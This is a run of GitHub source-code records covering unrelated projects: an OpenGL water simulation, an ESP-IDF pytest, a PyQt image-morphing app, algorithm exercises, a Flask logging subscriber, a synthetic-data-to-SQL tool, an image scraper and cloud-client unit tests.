on_drag(x, y):\n    fill_water(x, y)\n\n    for i in range(100):\n        fill_water(x + randint(-water_fill_range, water_fill_range), y + randint(-water_fill_range, water_fill_range))\n\nclick = False\ndef on_click(window, button, action, mods):\n    global click\n    if(button == MOUSE_BUTTON_LEFT):\n        if(action == PRESS):\n            click = True\n        elif(action == RELEASE):\n            click = False\ndef on_move(window, x, y):\n    new_x = (2 if env == 'Darwin' else 1) * x\n    new_y = (2 if env == 'Darwin' else 1) * y\n    if(click):\n        fill_water(math.floor(new_x), math.floor(new_y))\n\n        for i in range(10):\n            fill_water(math.floor(new_x) + randint(-water_fill_range, water_fill_range), math.floor(new_y) + randint(-water_fill_range, water_fill_range))\ndef main(title, version):\n    time = 0\n    init()\n    window = create_window(\n        windowsize[0] // 2 if env == 'Darwin' else windowsize[0], \n        windowsize[1] // 2 if env == 'Darwin' else windowsize[1], \n        f\"{title} {version}\", \n        None, \n        None\n    )\n    make_context_current(window)\n    #glutMouseFunc(on_click)\n    set_mouse_button_callback(window, on_click)\n    set_cursor_pos_callback(window, on_move)\n    #glutPassiveMotionFunc()\n\n    if env == 'Darwin':\n        fb_width, fb_height = get_framebuffer_size(window)\n        _x = -(windowsize[0] - fb_width) // 2\n        _y = -(windowsize[1] - fb_height) // 2\n        glViewport(_x, _y, windowsize[0], windowsize[1])\n    else:\n        glViewport(0, 0, windowsize[0], windowsize[1])\n    glMatrixMode(GL_PROJECTION)\n    glLoadIdentity()\n    glOrtho( 0, windowsize[0], 0, windowsize[1], 0, 10)\n    glPixelZoom( 1, -1 )\n    glRasterPos3f(0, windowsize[1], -0.3)\n    while not window_should_close(window):\n        glClearColor(0, 0, 0, 255)\n        glClear(GL_COLOR_BUFFER_BIT)\n        #newBuffer = update_buffer(__buffer)\n        update_water(time, __buffer, False)\n        glDrawPixels(*windowsize, GL_RGB, GL_UNSIGNED_BYTE, __buffer) # temporary: the global __buffer is mutated directly here;\n        # JIT-compiled functions, by contrast, receive the buffer as an argument and modify it\n        swap_buffers(window)\n        poll_events()\n        time = time + 1 # used for frame timing\n    terminate()\n\nmain(\"Lesser Flower\", 1.1)\n","repo_name":"LOSAT/LesserFlower","sub_path":"src/old/old.py","file_name":"old.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28088657845","text":"import pytest\nfrom pytest_embedded import Dut\n\n\n@pytest.mark.esp32\n@pytest.mark.generic\ndef test_himem(dut: Dut) -> None:\n\n    mem = dut.expect(r'esp_himem: Initialized. 
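# (Editor's aside on the sand/water simulation above: its move preference is
# down, down-left, down-right, then sideways, with `mem` limiting each cell to
# one move per frame. A tiny pure-Python sketch of the same rule on a
# hypothetical 4x4 grid, without numba or OpenGL; 1 marks water, 0 empty.)
def step(grid):
    h, w = len(grid), len(grid[0])
    moved = [[False] * w for _ in range(h)]  # plays the role of `mem`
    for y in range(h - 1):  # bottom row is skipped, like the exists() guard
        for x in range(w):
            if grid[y][x] != 1 or moved[y][x]:
                continue
            for nx, ny in ((x, y + 1), (x - 1, y + 1), (x + 1, y + 1), (x + 1, y), (x - 1, y)):
                if 0 <= nx < w and 0 <= ny < h and grid[ny][nx] == 0 and not moved[ny][nx]:
                    grid[y][x], grid[ny][nx] = 0, 1
                    moved[ny][nx] = True
                    break

grid = [[0, 1, 0, 0],
        [0, 1, 0, 0],
        [0, 0, 0, 0],
        [0, 0, 0, 0]]
step(grid)
# The upper drop slides down-left (straight down is occupied); the lower one falls.
assert grid[1][0] == 1 and grid[2][1] == 1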
Using last \\d+ 32KB address blocks for bank '\n r'switching on (\\d+) KB of physical memory.').group(1).decode('utf8')\n\n dut.expect(r'Himem has {}KiB of memory, \\d+KiB of which is free.'.format(mem), timeout=10)\n dut.expect_exact('Testing the free memory...')\n dut.expect_exact('Done!')\n","repo_name":"espressif/esp-idf","sub_path":"examples/system/himem/pytest_himem.py","file_name":"pytest_himem.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":11541,"dataset":"github-code","pt":"3"} +{"seq_id":"31996367045","text":"##############################\n# Author: Maanus Gulia\n# email: mgulia@purdue.edu\n# ID: ee364b04\n# Date: 11/27/19\n##############################\n\nimport os\nimport sys\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QGraphicsScene\nfrom MorphingGUI import *\nfrom Morphing import *\nimport numpy as np\nfrom PIL import ImageQt, Image\nfrom MorphingGUI import *\nfrom PyQt5 import QtCore, QtGui\nimport imageio as im\n\n\nclass MorphingApp(QMainWindow, Ui_MainWindow):\n\n def __init__(self, parent=None):\n self.flag = 0\n super(MorphingApp, self).__init__(parent)\n self.setupUi(self)\n self.scene = None\n self.sceneLeft = None\n self.sceneRight = None\n self.objShowTriangle.setDisabled(True)\n self.right00.setDisabled(True)\n self.objButtonBlend.setDisabled(True)\n self.horizontalSlider.setDisabled(True)\n self.objLoadStartingImage.setEnabled(True)\n self.objLoadEndingImage.setEnabled(True)\n self.objLoadStartingImage.clicked.connect(self.loadDataLeft)\n self.objLoadEndingImage.clicked.connect(self.loadDataRight)\n self.leftTextPath = ''\n self.rightTextPath = ''\n self.leftPicPath = ''\n self.rightPicPath = ''\n self.leftFlag = False\n self.rightFlag = False\n self.toggleLR = False\n self.leftGreen = False\n self.rightGreen = False\n self.alphaVal = 0\n self.objShowTriangle.stateChanged.connect(self.showTriangles)\n self.objButtonBlend.clicked.connect(self.blendImage)\n self.objGraphicLeft.mousePressEvent = self.plottingPointsLeft\n self.objGraphicRight.mousePressEvent = self.plottingPointsRight\n self.mousePressEvent = self.clickedAnywhere\n self.keyPressEvent = self.backSpaceHelper\n self.backSpaceLeft = None\n self.backSpaceRight = None\n self.leftCoordX = []\n self.leftCoordY = []\n self.rightCoordX = []\n self.rightCoordY = []\n\n\n def loadDataLeft(self):\n filePath, _=QFileDialog.getOpenFileName(self, caption=\"Load Image Left\")\n if not filePath:\n return\n self.loadStart(filePath)\n\n\n def loadDataRight(self):\n filePath, _ = QFileDialog.getOpenFileName(self, caption=\"Load Image Right\")\n if not filePath:\n return\n self.loadEnd(filePath)\n\n\n def loadStart(self, filePath):\n self.leftScene = QGraphicsScene()\n self.leftScene.addPixmap(QPixmap(filePath))\n self.objGraphicLeft.setScene(self.leftScene)\n self.objGraphicLeft.fitInView(self.leftScene.sceneRect(), QtCore.Qt.KeepAspectRatio)\n\n self.leftFlag = True\n self.leftPicPath = filePath\n leftPointPath = filePath + '.txt'\n\n if (os.path.exists(leftPointPath)):\n self.leftTextPath = leftPointPath\n with open(self.leftTextPath, 'r') as FILE:\n dataFile = FILE.readlines()\n\n #wont work if operating on empty file with no points\n coordX = []\n coordY = []\n for idx, line in enumerate(dataFile):\n temp = line.split()\n coordX.append(temp[0])\n coordY.append(temp[1])\n\n for x, y in zip(coordX, coordY):\n self.leftScene.addEllipse(float(x), float(y), 15, 15, QtGui.QPen(QtCore.Qt.red), 
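# (Editor's aside on the himem test that opens this line: dut.expect pulls the
# physical-memory size out of the boot log via a regex capture group. The same
# extraction with plain re, on a made-up log line; pytest-embedded returns
# bytes, hence the .decode('utf8') above.)
import re

line = ("esp_himem: Initialized. Using last 8 32KB address blocks for bank "
        "switching on 4096 KB of physical memory.")
m = re.search(r'esp_himem: Initialized. Using last \d+ 32KB address blocks for bank '
              r'switching on (\d+) KB of physical memory.', line)
assert m is not None and m.group(1) == '4096'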
QtGui.QBrush(QtCore.Qt.red))\n\n self.bothLoaded()\n\n\n def loadEnd(self, filePath):\n self.rightScene = QGraphicsScene()\n self.rightScene.addPixmap(QPixmap(filePath))\n self.objGraphicRight.setScene(self.rightScene)\n self.objGraphicRight.fitInView(self.rightScene.sceneRect(), QtCore.Qt.KeepAspectRatio)\n self.rightFlag = True\n self.rightPicPath = filePath\n rightPointPath = filePath + '.txt'\n\n if (os.path.exists(rightPointPath)):\n self.rightTextPath = rightPointPath\n with open(rightPointPath, 'r') as FILE:\n dataFile = FILE.readlines()\n\n #wont work if operating on open file with no points\n coordX = []\n coordY = []\n for idx, line in enumerate(dataFile):\n temp = line.split()\n coordX.append(temp[0])\n coordY.append(temp[1])\n\n for x, y in zip(coordX, coordY):\n self.rightScene.addEllipse(float(x), float(y), 15, 15, QtGui.QPen(QtCore.Qt.red), QtGui.QBrush(QtCore.Qt.red))\n\n self.bothLoaded()\n\n\n def bothLoaded(self):\n if self.leftFlag and self.rightFlag:\n self.objButtonBlend.setEnabled(True)\n self.right00.setEnabled(True)\n self.horizontalSlider.setEnabled(True)\n self.horizontalSlider.valueChanged.connect(self.alphaBar)\n self.objShowTriangle.setEnabled(True)\n\n def alphaBar(self):\n num = self.horizontalSlider.value()/100\n num = round(num*2.0, 1) / 2.0\n self.right00.setText(str(num))\n self.alphaVal = num\n\n\n def showTriangles(self):\n #if self.objShowTriangle.isChecked() and os.path.exists(self.leftTextPath) and os.path.exists(self.rightTextPath):\n if self.objShowTriangle.isChecked() and os.path.exists(self.leftPicPath + '.txt') and os.path.exists(self.rightPicPath + '.txt'):\n\n self.leftTextPath = self.leftPicPath + '.txt'\n self.rightTextPath = self.rightPicPath + '.txt'\n\n leftTri, rightTri = loadTriangles(self.leftTextPath, self.rightTextPath)\n\n for x in leftTri:\n self.leftScene.addLine(x.vertices[0][0], x.vertices[0][1], x.vertices[1][0], x.vertices[1][1],\n QtGui.QPen(QtCore.Qt.red))\n self.leftScene.addLine(x.vertices[2][0], x.vertices[2][1], x.vertices[1][0], x.vertices[1][1],\n QtGui.QPen(QtCore.Qt.red))\n self.leftScene.addLine(x.vertices[2][0], x.vertices[2][1], x.vertices[0][0], x.vertices[0][1],\n QtGui.QPen(QtCore.Qt.red))\n\n for y in rightTri:\n self.rightScene.addLine(y.vertices[0][0], y.vertices[0][1], y.vertices[1][0], y.vertices[1][1],\n QtGui.QPen(QtCore.Qt.red))\n self.rightScene.addLine(y.vertices[2][0], y.vertices[2][1], y.vertices[1][0], y.vertices[1][1],\n QtGui.QPen(QtCore.Qt.red))\n self.rightScene.addLine(y.vertices[2][0], y.vertices[2][1], y.vertices[0][0], y.vertices[0][1],\n QtGui.QPen(QtCore.Qt.red))\n else:\n for obj in self.leftScene.items():\n if isinstance(obj, QtWidgets.QGraphicsLineItem):\n self.leftScene.removeItem(obj)\n\n for obj2 in self.rightScene.items():\n if isinstance(obj2, QtWidgets.QGraphicsLineItem):\n self.rightScene.removeItem(obj2)\n\n\n def blendImage(self):\n left, right = loadTriangles(self.leftTextPath, self.rightTextPath)\n leftTri = np.array(imageio.imread(self.leftPicPath), np.uint8)\n rightTri = np.array(imageio.imread(self.rightPicPath), np.uint8)\n objM = Morpher(leftTri, left, rightTri, right)\n targetImage = objM.getImageAtAlpha(self.alphaVal)\n self.bottomScene = QGraphicsScene()\n varImage = Image.fromarray(targetImage.astype(np.uint8))\n varQ = QtGui.QImage(ImageQt.ImageQt(varImage))\n show = QtGui.QPixmap.fromImage(varQ)\n self.bottomScene.addPixmap(QtGui.QPixmap(show))\n self.objGraphicsBottom.setScene(self.bottomScene)\n self.objGraphicsBottom.fitInView(self.bottomScene.sceneRect(), 
QtCore.Qt.KeepAspectRatio)\n\n\n def plottingPointsLeft(self, event):\n if self.toggleLR == False and os.path.exists(self.leftPicPath):\n var = self.objGraphicLeft.mapToScene(event.pos())\n self.backSpaceLeft = self.leftScene.addEllipse(var.x() - 10, var.y() - 10, 20, 20, QtGui.QPen(),\n QtGui.QBrush(QtCore.Qt.green))\n\n if self.leftGreen and self.rightGreen:\n self.leftScene.addEllipse(self.pointOnLeft.x() - 10, self.pointOnLeft.y() - 10, 20, 20, QtGui.QPen(), QtGui.QBrush(QtCore.Qt.blue))\n self.rightScene.addEllipse(self.pointOnRight.x() - 10, self.pointOnRight.y() - 10, 20, 20, QtGui.QPen(), QtGui.QBrush(QtCore.Qt.blue))\n self.leftGreen = False\n self.rightGreen = False\n self.addPointsToFile()\n else:\n self.leftGreen = True\n\n self.toggleLR = True\n self.leftGreen = True\n self.pointOnLeft = var\n\n\n def plottingPointsRight(self, event):\n if self.toggleLR and os.path.exists(self.rightPicPath):\n var = self.objGraphicRight.mapToScene(event.pos())\n self.backSpaceRight = self.rightScene.addEllipse(var.x() - 10, var.y() - 10, 20, 20, QtGui.QPen(),\n QtGui.QBrush(QtCore.Qt.green))\n self.toggleLR = False\n self.rightGreen = True\n self.pointOnRight = var\n\n\n def backSpaceHelper(self, event):\n var = event.key()\n if var == QtCore.Qt.Key_Backspace:\n\n if self.leftGreen and self.toggleLR:\n self.objGraphicLeft.scene().removeItem(self.backSpaceLeft)\n self.leftGreen = False\n self.toggleLR = False\n\n elif self.rightGreen and not self.toggleLR:\n self.objGraphicRight.scene().removeItem(self.backSpaceRight)\n self.rightGreen = False\n self.toggleLR = True\n\n\n def clickedAnywhere(self, event):\n if self.leftGreen and self.rightGreen:\n self.leftScene.addEllipse(self.pointOnLeft.x() - 10, self.pointOnLeft.y() - 10, 20, 20, QtGui.QPen(),\n QtGui.QBrush(QtCore.Qt.blue))\n self.rightScene.addEllipse(self.pointOnRight.x() - 10, self.pointOnRight.y() - 10, 20, 20, QtGui.QPen(),\n QtGui.QBrush(QtCore.Qt.blue))\n\n self.addPointsToFile()\n self.leftGreen = False\n self.rightGreen = False\n\n\n def addPointsToFile(self):\n xL = str(round(self.pointOnLeft.x(), 1))\n yL = str(round(self.pointOnLeft.y(), 1))\n xR = str(round(self.pointOnRight.x(), 1))\n yR = str(round(self.pointOnRight.y(), 1))\n\n xL = xL.rjust(8)\n yL = yL.rjust(8)\n xR = xR.rjust(8)\n yR = yR.rjust(8)\n\n with open(self.leftPicPath + '.txt', 'a+') as FILE_LEFT:\n FILE_LEFT.write(xL + yL + '\\n')\n\n with open(self.rightPicPath + '.txt', 'a+') as FILE_RIGHT:\n FILE_RIGHT.write(xR + yR + '\\n')\n\n self.showTriangles()\n\n\nif __name__==\"__main__\":\n currentApp = QApplication(sys.argv)\n currentForm = MorphingApp()\n\n currentForm.show()\n currentApp.exec_()","repo_name":"mgulia/GUI-Image-Blending-Morphing","sub_path":"MorphingApp.py","file_name":"MorphingApp.py","file_ext":"py","file_size_in_byte":11076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30316895134","text":"# Find a duplicate, Space Edition\n\n'''\nWe have a list of integers, where:\n\nThe integers are in the range 1..n\nThe list has a length of n+1\n\nIt follows that our list has at least one integer which appears at least twice. 
But it may have several duplicates, \nand each duplicate may appear more than twice.\n\nWrite a function which finds an integer that \nappears more than once in our list.\n'''\n\n'''\ndef find_repeat(numbers):\n numbers_seen = set()\n for number in numbers:\n if number in numbers_seen:\n return number\n else:\n numbers_seen.add(number)\n\n # Whoops--no duplicate\n raise Exception('no duplicate!')\n\nbut O(n) time and O(n) space\n'''\n\n'''\ndef find_repeat_brute_force(numbers):\n for needle in range(1, len(numbers)):\n has_been_seen = False\n for number in numbers:\n if number == needle:\n if has_been_seen:\n return number\n else:\n has_been_seen = True\n\n # Whoops--no duplicate\n raise Exception('no duplicate!')\n\nbut O(n^2) time and O(1) space\n'''\n\n'''\nSort the list and find the adjacent values\n\nbut O(nlgn) time and O(1) space\n'''\n\n'''\n1. Find the number of integers in our input list which lie within the range 1..n/2 \n2. Compare that to the number of possible unique integers in the same range\n3. If the number of actual integers is greater than the number of possible integers, \nwe know there’s a duplicate in the range 1..n/2, so we iteratively use the same approach on that range\n4. If the number of actual integers is not greater than the number of possible integers, we know \nthere must be duplicate in the range n/2 + 1..n, so we iteratively use the same approach on that range\n5. At some point, our range will contain just 1 integer, which will be our answer\n'''\n\ndef find_repeat(numbers):\n floor = 1\n ceiling = len(numbers) - 1\n\n while floor < ceiling:\n # Divide our range 1..n into an upper range and lower range\n # (such that they don't overlap)\n # Lower range is floor..midpoint\n # Upper range is midpoint+1..ceiling\n midpoint = floor + ((ceiling - floor) // 2)\n lower_range_floor, lower_range_ceiling = floor, midpoint\n upper_range_floor, upper_range_ceiling = midpoint+1, ceiling\n\n # Count number of items in lower range\n items_in_lower_range = 0\n for item in numbers:\n # Is it in the lower range?\n if item >= lower_range_floor and item <= lower_range_ceiling:\n items_in_lower_range += 1\n\n distinct_possible_integers_in_lower_range = (\n lower_range_ceiling\n - lower_range_floor\n + 1\n )\n if items_in_lower_range > distinct_possible_integers_in_lower_range:\n # There must be a duplicate in the lower range\n # so use the same approach iteratively on that range\n floor, ceiling = lower_range_floor, lower_range_ceiling\n else:\n # There must be a duplicate in the upper range\n # so use the same approach iteratively on that range\n floor, ceiling = upper_range_floor, upper_range_ceiling\n\n # Floor and ceiling have converged\n # We found a number that repeats!\n return floor\n\n# O(1) space and O(nlgn) time\n","repo_name":"dennikey/Interview-Cake","sub_path":"Interview Cake/Unit 4 Sorting, searching, and logarithms/find-repeat,space-edition.py","file_name":"find-repeat,space-edition.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"742645176","text":"\nfrom typing import List, Dict, Tuple\n\npiles_memory: Dict[int, int] = {0: 1}\n\n\ndef pentagonal(k):\n return (k * ((3 * k) - 1)) / 2\n\n\ndef all_partitions(coins: int) -> int:\n \"\"\"\n :param coins: overall coins we need to find the partition of to piles\n :return: amount of ways we can divide to piles\n \"\"\"\n global piles_memory\n\n if coins < 0:\n return 0\n\n if coins not in piles_memory.keys():\n k 
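# (Editor's aside: a quick sanity check of the binary-search-on-values routine
# above, assuming find_repeat from that snippet is in scope. Note the answer is
# the repeated value itself, not an index.)
numbers = [4, 1, 3, 4, 2]  # n = 4, length n + 1, so some value must repeat
assert find_repeat(numbers) == 4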
= 0\n next_partition_number = 1\n result = 0\n while next_partition_number > 0:\n k += 1\n for ii in [1, -1]:\n next_pentagonal = pentagonal(ii * k)\n next_partition_number = all_partitions(coins - next_pentagonal)\n result += ((-1) ** (k + 1)) * next_partition_number\n piles_memory[coins] = result % 1000000\n\n return piles_memory[coins]\n\n\ndef main():\n n = 1\n # amount = all_partitions(n)\n amount = 1\n while amount != 0:\n print(f\"n: {n}, partitions: {amount}\")\n n += 1\n amount = all_partitions(n)\n\n # The answer is n = 55374\n print(f\"n: {n}, partitions: {amount}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SagieSH/project_euler","sub_path":"src/euler078.py","file_name":"euler078.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2671044144","text":"import google.cloud.logging as logging\nimport base64\nimport ast\nimport os\nfrom datetime import datetime, timedelta\nfrom flask import Flask, request, Response\n\napp = Flask(__name__)\n\n\n@app.route(\"/log-sub\", methods=['POST'])\ndef process_data():\n req = request.get_json(silent=True)\n if not req:\n return Response(\"{'error': 'no Pub/Sub message received'}\", status=400, mimetype='application/json')\n if not isinstance(req, dict) or \"message\" not in req:\n return Response(\"{'error': 'invalid Pub/Sub message format'}\", status=400, mimetype='application/json')\n if not isinstance(req[\"message\"], dict) or \"data\" not in req[\"message\"]:\n return Response(\"{'error': 'no data in message received'}\", status=400, mimetype='application/json')\n content = base64.b64decode(req[\"message\"][\"data\"]).decode(\"utf-8\")\n content = ast.literal_eval(content)\n # action, memberId is must have\n now = (datetime.utcnow() + timedelta(hours = 8)).strftime(\"%Y.%m.%d %H:%M:%S\")\n if 'action' in content and content['action']:\n action = content['action']\n else:\n return Response(\"{'error': 'parameter error: action missing'}\", status=400, mimetype='application/json')\n \n if 'memberId' in content and content['memberId'] and content['memberId'] != 0:\n memberId = content['memberId']\n else:\n return Response(\"{'error': 'parameter error: memberId missing'}\", status=400, mimetype='application/json')\n\n if 'targetId' in content and content['targetId']:\n objId = content['targetId']\n elif 'commentId' in content and content['commentId']:\n objId = content['commentId']\n elif 'storyId' in content and content['storyId']:\n objId = content['storyId']\n elif 'collectionId' in content and content['collectionId']:\n objId = content['collectionId']\n else:\n objId = ''\n \n objective = content['objective'] if 'objective' in content and content['objective'] else ''\n uuid = content['UUID'] if 'UUID' in content and content['UUID'] else''\n clientOS = content['os'] if 'os' in content and content['os'] else ''\n version = content['version'] if 'version' in content and content['version'] else ''\n device = content['device'] if 'device' in content and content['device'] else ''\n \n project_id = os.environ['project_id']\n log_name = os.environ['log_name'] # readr-mesh-user-log-dev\n logger_name = f'projects/{project_id}/logs/{log_name}'\n resource = logging.Resource(type='global', labels={'project_id': project_id})\n clientInfo = {\n 'client-info':\n {\n 'current-runtime-start': now,\n 'datetime': now,\n 'exit-time': now,\n 'action': action,\n 'memberId': memberId,\n 'objId': objId,\n 'objective': objective\n },\n 'client-os': 
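# (Editor's aside on the Project Euler record above: the recurrence behind
# all_partitions is Euler's pentagonal number theorem,
#   p(n) = sum over k >= 1 of (-1)**(k+1) * (p(n - g(k)) + p(n - g(-k))),
# with generalized pentagonal numbers g(k) = k*(3k - 1)/2. A self-contained
# sketch -- without the mod 1,000,000 used above -- checked against known values:)
def g(k):
    return k * (3 * k - 1) // 2

def partitions(n, memo={0: 1}):  # default-arg memo mirrors the module-level piles_memory
    if n < 0:
        return 0
    if n not in memo:
        total, k = 0, 1
        while g(k) <= n:  # once g(k) > n, both terms for this k vanish
            for kk in (k, -k):
                total += (-1) ** (k + 1) * partitions(n - g(kk))
            k += 1
        memo[n] = total
    return memo[n]

assert [partitions(n) for n in range(1, 10)] == [1, 2, 3, 5, 7, 11, 15, 22, 30]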
{\n            'UUID': uuid,\n            'name': clientOS,\n            'version': version,\n            'device name': device,\n        }\n    }\n    logging_client = logging.Client()\n    logger = logging_client.logger(logger_name)\n    logger.log_struct(info = clientInfo, severity = \"INFO\", resource = resource, log_name = logger_name)\n    return \"success\"\n\n\n@app.route(\"/\")\ndef healthcheck():\n    return \"ok\"\n\n\nif __name__ == \"__main__\":\n    app.run()","repo_name":"yatiti84/mesh-subscriber","sub_path":"userlog_subscriber/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71199071123","text":"#!/usr/bin/env python\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy_utils import database_exists, create_database\nfrom rich.console import Console\nfrom rich.progress import track\nimport numpy as np\nimport pandas as pd\nfrom scipy.linalg import eigh\n\n\n__all__ = [\"make_df\", \"to_sql\"]\n__author__ = \"big-o\"\n\n\nconsole = Console()\n\n\ndef _prepare_fields(flds):\n    flds = flds.copy()\n\n    for key in flds:\n        fld = flds[key]\n        if \"priors\" not in fld and fld.get(\"repeat\", True):\n            vals = fld[\"values\"]\n            # Create random priors for each value.\n            p = np.random.normal(size=len(vals))\n            # Softmax to get probabilities.\n            priors = np.exp(p) / np.exp(p).sum()\n\n            fld[\"priors\"] = priors\n\n    return flds\n\n\ndef _make_row(flds, rownum):\n    row = {\n        name: np.random.choice(fld[\"values\"], p=fld[\"priors\"])\n        for name, fld in flds.items()\n        if fld.get(\"repeat\", True)\n    }\n\n    return row\n\n\ndef _validate_corr(corr, flds):\n    if not isinstance(corr, pd.DataFrame):\n        raise ValueError(\"correlation matrix must be a pandas DataFrame.\")\n\n    nflds = len(flds)\n    if corr.shape != (nflds, nflds):\n        raise ValueError(\n            \"correlation matrix must be square and have one column/row for each field \"\n            \"in your schema.\"\n        )\n\n    if not all(np.issubdtype(t, np.number) for t in corr.dtypes):\n        raise ValueError(\"correlation matrix must be numeric.\")\n\n    try:\n        corr = corr[flds].loc[flds]\n    
except KeyError:\n raise ValueError(\n \"correlation matrix index and columns must be the field names for your \"\n \"schema.\"\n )\n\n if not np.allclose(corr, corr.T):\n raise ValueError(\"correlation matrix must be symmetric\")\n\n return corr\n\n\ndef make_df(table, size, fields, corr=None):\n \"\"\"\n Create a random dataframe that follows the specified schema.\n \"\"\"\n\n fields = _prepare_fields(fields)\n data = []\n\n # Generate\n try:\n for i in track(range(size), description=\"Generating data...\"):\n data.append(_make_row(fields, i))\n except KeyboardInterrupt:\n # Catch Ctrl+C to just truncate the dataframe.\n console.log(f\"[white on red]Truncating data at [bold]{len(data)}[/] rows.[/]\")\n\n df = pd.DataFrame(data)\n\n # Non-repeat fields weren't added. Add those now.\n for field, schema in fields.items():\n if not schema.get(\"repeat\", True):\n vals = list(schema[\"values\"])\n if size > len(vals):\n # Pad it out with a few NULLs\n vals = vals + [None] * (size - len(vals))\n\n # Use len(df) instead of size in case it was truncated.\n col = np.random.choice(vals, replace=False, size=len(df))\n df[field] = col\n\n # Reset the ordering\n flds = list(fields.keys())\n df = df[flds]\n\n # Alter the random values to add in any correlation if requested.\n if corr is not None:\n # corr must be a square dataframe with the indices and columns being the\n # fields.\n corr = _validate_corr(corr)\n\n # Compute the eigenvalues and eigenvectors.\n evals, evecs = eigh(corr)\n # Construct c, so c*c^T = corr.\n c = np.dot(evecs, np.diag(np.sqrt(evals)))\n\n # Convert the data to correlated random variables.\n df[:] = np.dot(c, df.values)\n\n sort_cols = [\n (fields[fld][\"sort\"], fld) for fld in fields if fields[fld].get(\"sort\", False)\n ]\n if len(sort_cols) > 0:\n sort_cols.sort()\n sort_cols = [f[1] for f in sort_cols]\n df.sort_values(sort_cols, inplace=True)\n\n df.name = table\n return df\n\n\ndef to_sql(df, url, db, if_exists):\n \"\"\"\n Write the contents of a dataframe to a SQL database.\n \"\"\"\n engine = create_engine(url, pool_recycle=3600)\n conn = engine.connect()\n\n # conn.execute(f\"CREATE DATABASE IF NOT EXISTS {db}\")\n # conn.execute(f\"USE {db}\")\n if not database_exists(url):\n create_database(url)\n\n if if_exists == \"replace\":\n # Bug workaround\n conn.execute(f\"DROP TABLE IF EXISTS {df.name}\")\n\n frame = df.to_sql(df.name, conn, index=False, if_exists=if_exists)\n\n conn.close()\n\n console.log(\n f\"Table [bold magenta]`{db}:{df.name}'[/] created successfully. 
\"\n f\"Uploaded [italic red]{len(df)}[/] rows.\"\n )\n","repo_name":"big-o/toolbox","sub_path":"datagen/datagen/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11876011628","text":"import requests\r\nfrom urllib import request\r\nfrom lxml import etree\r\nimport re\r\n\r\n#确定种子URL\r\nbase_url = 'http://bing.plmeizi.com/'\r\n#请求基本页面\r\nresponse = requests.get(base_url)\r\n#初步解析\r\ntext = response.content.decode('utf-8')\r\nhtml = etree.HTML(text)\r\n\r\n#建立URL队列\r\nimgs = html.xpath('//div[@class=\"list \"]//img')\r\n#基于URL队列:1.提取了每张图片的URL,2.提取了图片的中文说明,3.确定图片名称,4.对每个URL地址,进行图片的请求和本地保存。\r\nfor img in imgs:\r\n img_url = re.sub(r'-listpic','',img.get('src'))\r\n img_illustrate = re.findall(r'(.*?)\\s\\(.*?\\)',img.get('alt'))[0]\r\n img_filename = img_illustrate + '.jpg'\r\n request.urlretrieve(img_url,'Bing_每日美图/' + img_filename)","repo_name":"cleanworld123/Python3_Spider_Practice","sub_path":"Python3_Spider_Junior/CH01/1.2.py","file_name":"1.2.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12184562702","text":"\"\"\"\nUnit tests for the CloudClient\n\n\n\"\"\"\n\n\nfrom cloudadapter.cloud.client.connections._connection import Connection\nfrom cloudadapter.cloud.client.messengers._messenger import Messenger\nfrom cloudadapter.cloud.client.handlers._handler import Handler\nfrom cloudadapter.cloud.client.cloud_client import CloudClient\n\nimport datetime\n\nimport unittest\nimport mock\n\n\nclass TestCloudClient(unittest.TestCase):\n\n def setUp(self):\n self.mock_connection = mock.create_autospec(Connection)\n self.mock_telemetry = mock.create_autospec(Messenger)\n self.mock_attribute = mock.create_autospec(Messenger)\n self.mock_event = mock.create_autospec(Messenger)\n self.mock_handler = mock.create_autospec(Handler)\n\n self.cloud_client = CloudClient(\n connection=self.mock_connection,\n telemetry=self.mock_telemetry,\n event=self.mock_event,\n attribute=self.mock_attribute,\n handler=self.mock_handler\n )\n\n def test_publish_telemetry_succeeds(self):\n args = (\"key\", \"value\", datetime.datetime.utcnow())\n self.cloud_client.publish_telemetry(*args)\n assert self.mock_telemetry.publish.call_count == 1\n\n def test_publish_attribute_succeeds(self):\n args = (\"key\", \"value\")\n self.cloud_client.publish_attribute(*args)\n assert self.mock_attribute.publish.call_count == 1\n\n def test_publish_event_succeeds(self):\n args = (\"key\", \"value\")\n self.cloud_client.publish_event(*args)\n assert self.mock_event.publish.call_count == 1\n\n def test_bind_callback_succeeds(self):\n args = (\"name\", lambda **_: None)\n self.cloud_client.bind_callback(*args)\n assert self.mock_handler.bind.call_count == 1\n\n def test_connect_succeeds(self):\n self.cloud_client.connect()\n assert self.mock_connection.start.call_count == 1\n\n def test_disconnect_succeeds(self):\n self.cloud_client.disconnect()\n assert self.mock_connection.stop.call_count == 1\n","repo_name":"intel/intel-inb-manageability","sub_path":"inbm/cloudadapter-agent/tests/unit/cloud/client/test_cloud_client.py","file_name":"test_cloud_client.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"3"} +{"seq_id":"32249848430","text":"import sys\n\ndef refBase_filter(fileName):\n data = open(fileName, 
